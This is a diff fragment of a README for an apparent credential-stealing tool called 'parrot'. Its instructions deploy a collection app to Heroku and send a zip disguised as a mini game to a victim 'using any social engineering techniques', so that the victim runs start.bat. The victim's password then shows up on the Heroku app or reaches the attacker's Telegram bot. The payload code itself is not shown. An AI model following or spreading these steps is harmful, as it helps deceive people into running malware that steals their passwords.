ba5liel/parrot/README.md

 heroku login
 git push -u heroku
 ```
-send the payload.zip to victim using any social engineering techniques. and make sure the victim opens the start.bat file
+send the Game-monkey-lander.zip to victim using any social engineering techniques. and make sure the victim opens the start.bat file
-now you can see the password at [yourapp].heroku.com
+now you can see the password at [yourapp].heroku.com or it's sent to your telegram account through the bot you setted up using @BotFather
 # payload
 this include a mini game that launches when start.bat is opened.
 you must change the start.bat in the payload